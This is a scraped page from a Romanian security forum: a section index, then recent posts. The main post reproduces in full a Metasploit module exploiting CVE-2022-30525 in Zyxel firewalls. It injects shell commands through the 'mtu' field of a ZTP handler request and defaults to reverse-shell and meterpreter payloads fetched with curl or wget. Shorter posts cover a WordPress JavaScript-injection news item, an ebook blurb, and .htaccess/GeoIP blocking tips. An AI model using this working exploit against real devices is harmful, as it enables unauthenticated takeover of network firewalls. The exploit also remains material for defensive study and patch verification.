Jump to content
  1. Informatii generale

    1. Anunturi importante

      Anunturile importante si regulile forumului. Cititi regulamentu​l inainte de a posta.

      12.6k
      posts
    2. Bine ai venit

      Bine ati venit pe forumul Romanian Security Team, aici va puteti prezenta (optional)

      18.1k
      posts
    3. Proiecte RST

      Aici veti putea gasi toate programele, tutorialele, metodele si exploiturile create de catre membrii RST

      4.4k
      posts
  2. Sectiunea tehnica

    1. Exploituri

      Cele mai noi exploituri, POC-uri sau shellcode-uri

      7.4k
      posts
    2. Challenges (CTF)

      Challenge-uri - Wargames, pentru amatorii CTF-urilor

      9.5k
      posts
    3. Bug Bounty

      Categorie destinata discutiilor referitoare la site-urile care au un program Bug Bounty in desfasurare prin care rasplatesc persoanele care le raporteaza vulnerabilitati

      2.2k
      posts
    4. Programare

      Coltul programatorilor: C/C++, Visual Basic, .NET, Java, ASM, Shell scripting, Perl, Python

      22.7k
      posts
    5. Securitate web

      Tutoriale si discutii legate de securitatea aplicatiilor web

      635
      posts
    6. Reverse engineering & exploit development

      Tutoriale despre analiza malware, sample-uri, cod sursa, programe utile, reverse engineering si exploit development

      1.9k
      posts
    7. Mobile security

      Discutii despre telefoane mobile, root-ing, jailbreak-ing etc.

      12.6k
      posts
    8. Sisteme de operare si discutii hardware

      Discutii in materie hardware, windows, unix, bsd etc.

      7.6k
      posts
    9. Electronica

      Discutii generale despre electronica

      2.6k
      posts
    10. Wireless Pentesting

      Wardriving area, WiFi, Bluetooth si GSM hacking

      3.8k
      posts
    11. Black SEO & monetizare

      Tips & tricks, questions, monetizare

      8.8k
      posts
  3. Programe

    1. Programe hacking

      Postati aici utilitare cum ar fi sniffere, bruteforcers, fuzzers etc. Nu faceti cereri aici.

      28.2k
      posts
    2. Programe securitate

      Postati aici programe cum ar fi firewall-uri, antivirusi si programe similare

      2.7k
      posts
    3. Programe utile

      Programe ce nu se incadreaza in celelalte sectiuni: hack sau securitate

      12.1k
      posts
    4. Free stuff

      Diverse lucruri utile, fiind excluse root-uri, SMTP-uri, VPS-uri etc.

      8.7k
      posts
  4. Discutii generale

    1. RST Market

      Orice vanzare/cumparare care are legatura cu frauda online/bancara sau access neautorizat este penalizata cu ban permanent!  Minim 50 de posturi pentru acces!

      23.9k
      posts
    2. Off-topic

      Discutii pe diverse teme, discutii care nu se incadreaza la celalalte categorii. Doar discutii din domeniul IT!

      137.5k
      posts
    3. Discutii incepatori

      Daca esti incepator, ai o intrebare simpla sau vrei sa stii mai multe despre un domeniu, aici e sectiunea potrivita

      3k
      posts
    4. Stiri securitate

      Stiri din domeniul securitatii IT

      20.3k
      posts
    5. Linkuri

      Postati aici doar linkurile despre securitate!

      9.4k
      posts
    6. Cosul de gunoi

      Toate topicurile care au deviat de la raspuns vor fi mutate aici.

      45.2k
      posts
  • Topics

  • Posts

    • This Metasploit module exploits CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. By sending a malicious setWanPortSt command containing an mtu field with a crafted OS command to the /ztp/cgi-bin/handler page, an attacker can gain remote command execution as the nobody user. Affected Zyxel models are USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below, USG20-VPN and USG20W-VPN using firmware 5.21 and below, and ATP 100, 200, 500, 700, 800 using firmware 5.21 and below.   ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   class MetasploitModule < Msf::Exploit::Remote   Rank = ExcellentRanking     prepend Msf::Exploit::Remote::AutoCheck   include Msf::Exploit::Remote::HttpClient   include Msf::Exploit::CmdStager     def initialize(info = {})     super(       update_info(         info,         'Name' => 'Zyxel Firewall ZTP Unauthenticated Command Injection',         'Description' => %q{           This module exploits CVE-2022-30525, an unauthenticated remote           command injection vulnerability affecting Zyxel firewalls with zero           touch provisioning (ZTP) support. By sending a malicious setWanPortSt           command containing an mtu field with a crafted OS command to the           /ztp/cgi-bin/handler page, an attacker can gain remote command execution           as the nobody user.             Affected Zyxel models are:             * USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below           * USG20-VPN and USG20W-VPN using firmware 5.21 and below           * ATP 100, 200, 500, 700, 800 using firmware 5.21 and below         },         'License' => MSF_LICENSE,         'Author' => [           'jbaines-r7' # Vulnerability discovery and Metasploit module         ],         'References' => [           [ 'CVE', '2022-30525' ],           [ 'URL', 'https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/']         ],         'DisclosureDate' => '2022-04-28',         'Platform' => ['unix', 'linux'],         'Arch' => [ARCH_CMD, ARCH_MIPS64,],         'Privileged' => false,         'Targets' => [           [             'Shell Dropper',             {               'Platform' => 'unix',               'Arch' => ARCH_CMD,               'Type' => :unix_cmd,               'DefaultOptions' => {                 'PAYLOAD' => 'cmd/unix/reverse_bash'               }             }           ],           [             'Linux Dropper',             {               'Platform' => 'linux',               'Arch' => [ARCH_MIPS64],               'Type' => :linux_dropper,               'CmdStagerFlavor' => [ 'curl', 'wget' ],               'DefaultOptions' => {                 'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp'               }             }           ]         ],         'DefaultTarget' => 0,         'DefaultOptions' => {           'RPORT' => 443,           'SSL' => true         },         'Notes' => {           'Stability' => [CRASH_SAFE],           'Reliability' => [REPEATABLE_SESSION],           'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]         }       )     )     register_options([       OptString.new('TARGETURI', [true, 'Base path', '/'])     ])   end     # Checks the build date that is embedded in the landing page. If it finds a build   # date older than April 20, 2022 then it will additionally check if the model is   # a USG FLEX, USG20[w]?-VPN, or an ATP system. Command execution is blind so this   # seems like a reasonable approach.   def check     res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/'))     unless res       return CheckCode::Unknown('The target failed to respond to check.')     end       unless res.code == 200       return CheckCode::Safe('Failed to retrieve /')     end       ver = res.body[/favicon\.ico\?v=(?<build_date>[0-9]{6,})/, :build_date]     if ver.nil?       return CheckCode::Safe('Could not extract a version number')     end       if ver[0..5].to_i < 220420       model = res.get_html_document.xpath('//title').text       if model.include?('USG FLEX') || model.include?('ATP') || (model.include?('USG20') && model.include?('-VPN'))         return CheckCode::Appears("This was determined by the model and build date: #{model}, #{ver}")       end     end       CheckCode::Safe("This determination is based on the build date string: #{ver}.")   end     def execute_command(cmd, _opts = {})     handler_uri = normalize_uri(target_uri.path, '/ztp/cgi-bin/handler')     print_status("Sending command to #{handler_uri}")       # this is the POST data. exploit goes into the mtu field. technically, `data` is a usable vector too     # but it's more involved.     http_payload = {       'command' => 'setWanPortSt',       'proto' => 'dhcp',       'port' => Rex::Text.rand_text_numeric(4).to_s,       'vlan_tagged' => Rex::Text.rand_text_numeric(4).to_s,       'vlanid' => Rex::Text.rand_text_numeric(4).to_s,       'mtu' => ";#{cmd};",       'data' => ''     }       res = send_request_cgi({       'method' => 'POST',       'uri' => handler_uri,       'headers' =>       {         'Content-Type' => 'application/json; charset=utf-8'       },       'data' => http_payload.to_json     })     # Successful exploitation can result in no response (connection being held open by a reverse shell)     # or, if the command executes immediately, a response with a 503.     if res && res.code != 503       fail_with(Failure::UnexpectedReply, "The target replied with HTTP status #{res.code}. No reply was expected.")     end     print_good('Command successfully executed.')   end     def exploit     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")     case target['Type']     when :unix_cmd       execute_command(payload.encoded)     when :linux_dropper       execute_cmdstager     end   end end   #  0day.today [2022-05-17]  #   Source
    • Cybersecurity researchers have disclosed a massive campaign that's responsible for injecting malicious JavaScript code into compromised WordPress websites that redirects visitors to scam pages and other malicious websites to generate illegitimate traffic.     This involved infecting files such as jquery.min.js and jquery-migrate.min.js with obfuscated JavaScript that's activated on every page load, allowing the attacker to redirect the website visitors to a destination of their choice.   The GoDaddy-owned website security company said that the domains at the end of the redirect chain could be used to load advertisements, phishing pages, malware, or even trigger another set of redirects.     In some instances, unsuspecting users are taken to a rogue redirect landing page containing a fake CAPTCHA check, clicking which serves unwanted ads that are disguised to look as if they come from the operating system and not from a web browser.   The campaign — a continuation of another wave that was detected last month — is believed to have impacted 322 websites so far, starting May 9. The April set of attacks, on the other hand, has breached over 6,500 websites.     Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post.   Source
    • A Drama in Three Acts Security is perhaps the most neglected area of information technology. It is extensive, diverse and complex. It is political. It is ungrateful. It is a drama. An attempt to cope in three acts.     About the Author The Author is working over 25 years in IT and mechanical engineering businesses as architect, developer, UNIX system/network administrator and entrepreneur. As cofounder of Micro-Colocation.com, his focus since 2021 has been on green edge computing for small computers. This colocation service was recently released and is happy to welcome any Raspberry Pi, Odroid, Jetson Nano and other Single Board Computer enthusiasts. CC licensed texts like this drama are created within the working hours of this company. You can support the text production by sharing the Micro-Colocation.com link in your network and, of course by booking colocation services. Many thanks.   Table of Contents Prologue........................................................................................................................2 First Act.........................................................................................................................4 First Scene – The Dilemmas...............................................................................4 Second Scene – The Developer..........................................................................6 Third scene – The Allies......................................................................................7 Fourth Scene – The Concept............................................................................12 Second Act..................................................................................................................15 First Scene – The Application..........................................................................15 Second Scene – The Identification..................................................................18 Third Scene – The Access..................................................................................22 Fourth Scene – The Encryption.......................................................................24 Third Act.....................................................................................................................26 Last Scene: The Implementation.....................................................................26 Epilogue......................................................................................................................29 Please / Thank you...................................................................................................29 Props............................................................................................................................30   eBook Versions: English Translation: IT Security for Developers — A Drama in Three Acts | May 2022   Deutsche Originalversion, empfohlen für Muttersprachler: IT Sicherheit für Entwickler — Ein Drama in drei Akten | Mai 2022   Source
    • Buna ideea. Cu GeoIP mod pt. apache   GeoIPEnable On # doamne futa-va pe toti si scapam de greutati :)) SetEnvIf GEOIP_COUNTRY_CODE CN BlockCountry SetEnvIf GEOIP_COUNTRY_CODE RU BlockCountry SetEnvIf GEOIP_COUNTRY_CODE UA BlockCountry SetEnvIf GEOIP_COUNTRY_CODE IN BlockCountry <RequireAll> Require all granted Require not env BlockCountry </RequireAll>  
    • ,,,SirGod,cu chestiile astea chiar ca sunt paralel,scuze...!!!
    • Trebuie si putin cod custom pe langa integrare. Il integrezi in site, salvezi fingerprinturile si cand faci match (e.g. nume cont, posturi) la user cu un fingerprint il folosesti ca sa il blochezi (aici ai diverse optiuni, pe client-side sau trimiti fingerprintul pe server-side si blochezi la nivel de .htaccess, cod, etc.)
    • ,,,m-a terorizat acest intRUS...imi face aprox 100 de inregistrari zilnic pe forum...!!! ,,,cum scap de ASTA...???
    • ,,,cu multzumiri Dragos,dar eu fiind out in programare ti-as fi recunoscator daca m-ai ajuta la aceast tip de blocare cu IP Address in forumul IPS Community Suite...!!! ,,,cu stima...!!!
    • Ai ban prin htaccess https://htaccessbook.com/block-ip-address/
×
×
  • Create New...